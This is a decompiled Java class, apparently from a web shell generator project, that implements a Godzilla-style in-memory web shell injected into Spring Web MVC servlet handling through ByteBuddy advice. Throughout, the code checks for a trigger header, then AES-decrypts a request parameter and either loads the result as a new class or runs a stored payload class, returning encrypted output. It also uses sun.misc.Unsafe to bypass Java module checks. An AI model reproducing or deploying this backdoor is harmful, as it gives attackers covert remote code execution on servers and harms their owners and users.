package com.reajason.javaweb.memshell.springwebmvc.godzilla;

import java.io.ByteArrayOutputStream;
import java.io.PrintWriter;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import net.bytebuddy.asm.Advice;

/* loaded from: input_file:com/reajason/javaweb/memshell/springwebmvc/godzilla/GodzillaServletAdvisor.class */
public class GodzillaServletAdvisor {
    @Advice.OnMethodEnter(skipOn = Advice.OnNonDefaultValue.class)
    public static boolean enter(@Advice.Argument(0) Object obj, @Advice.Argument(1) Object obj2, @Advice.Origin Class<?> cls) {
        byte[] bArr;
        String str;
        try {
            Field declaredField = Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");
            declaredField.setAccessible(true);
            Object obj3 = declaredField.get(null);
            Object invoke = Class.class.getMethod("getModule", new Class[0]).invoke(Object.class, (Object[]) null);
            obj3.getClass().getMethod("getAndSetObject", Object.class, Long.TYPE, Object.class).invoke(obj3, cls, (Long) obj3.getClass().getMethod("objectFieldOffset", Field.class).invoke(obj3, Class.class.getDeclaredField("module")), invoke);
        } catch (Exception e) {
        }
        try {
            String str2 = (String) obj.getClass().getMethod("getHeader", String.class).invoke(obj, "headerName");
            if (str2 == null || !str2.contains("headerValue")) {
                return false;
            }
            String str3 = (String) obj.getClass().getMethod("getParameter", String.class).invoke(obj, "pass");
            try {
                Class<?> cls2 = Class.forName("java.util.Base64", true, Thread.currentThread().getContextClassLoader());
                Object invoke2 = cls2.getMethod("getDecoder", (Class[]) null).invoke(cls2, (Object[]) null);
                bArr = (byte[]) invoke2.getClass().getMethod("decode", String.class).invoke(invoke2, str3);
            } catch (Exception e2) {
                Object newInstance = Class.forName("sun.misc.BASE64Decoder", true, Thread.currentThread().getContextClassLoader()).newInstance();
                bArr = (byte[]) newInstance.getClass().getMethod("decodeBuffer", String.class).invoke(newInstance, str3);
            }
            Class<?> cls3 = Class.forName("javax.crypto.Cipher", true, Thread.currentThread().getContextClassLoader());
            Class<?> cls4 = Class.forName("javax.crypto.spec.SecretKeySpec", true, Thread.currentThread().getContextClassLoader());
            Method method = cls3.getMethod("init", Integer.TYPE, Class.forName("java.security.Key", true, Thread.currentThread().getContextClassLoader()));
            Method method2 = cls3.getMethod("doFinal", byte[].class);
            Object invoke3 = cls3.getMethod("getInstance", String.class).invoke(cls3, "AES");
            Object newInstance2 = cls4.getConstructor(byte[].class, String.class).newInstance("key".getBytes(), "AES");
            method.invoke(invoke3, 2, newInstance2);
            byte[] bArr2 = (byte[]) method2.invoke(invoke3, bArr);
            Object invoke4 = obj.getClass().getMethod("getSession", new Class[0]).invoke(obj, new Object[0]);
            Object invoke5 = invoke4.getClass().getMethod("getAttribute", String.class).invoke(invoke4, "payload");
            if (invoke5 == null) {
                Method declaredMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
                declaredMethod.setAccessible(true);
                invoke4.getClass().getMethod("setAttribute", String.class, Object.class).invoke(invoke4, "payload", (Class) declaredMethod.invoke(Thread.currentThread().getContextClassLoader(), bArr2, 0, Integer.valueOf(bArr2.length)));
                return true;
            }
            obj.getClass().getMethod("setAttribute", String.class, Object.class).invoke(obj, "parameters", bArr2);
            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            Object newInstance3 = ((Class) invoke5).newInstance();
            newInstance3.equals(byteArrayOutputStream);
            newInstance3.equals(obj);
            PrintWriter printWriter = (PrintWriter) obj2.getClass().getMethod("getWriter", new Class[0]).invoke(obj2, new Object[0]);
            printWriter.write("md5".substring(0, 16));
            newInstance3.toString();
            method.invoke(invoke3, 1, newInstance2);
            byte[] bArr3 = (byte[]) method2.invoke(invoke3, byteArrayOutputStream.toByteArray());
            try {
                Class<?> cls5 = Class.forName("java.util.Base64");
                Object invoke6 = cls5.getMethod("getEncoder", (Class[]) null).invoke(cls5, (Object[]) null);
                str = (String) invoke6.getClass().getMethod("encodeToString", byte[].class).invoke(invoke6, bArr3);
            } catch (Exception e3) {
                Object newInstance4 = Class.forName("sun.misc.BASE64Encoder").newInstance();
                str = (String) newInstance4.getClass().getMethod("encode", byte[].class).invoke(newInstance4, bArr3);
            }
            printWriter.write(str);
            printWriter.write("md5".substring(16));
            return true;
        } catch (Exception e4) {
            e4.printStackTrace();
            return false;
        }
    }
}
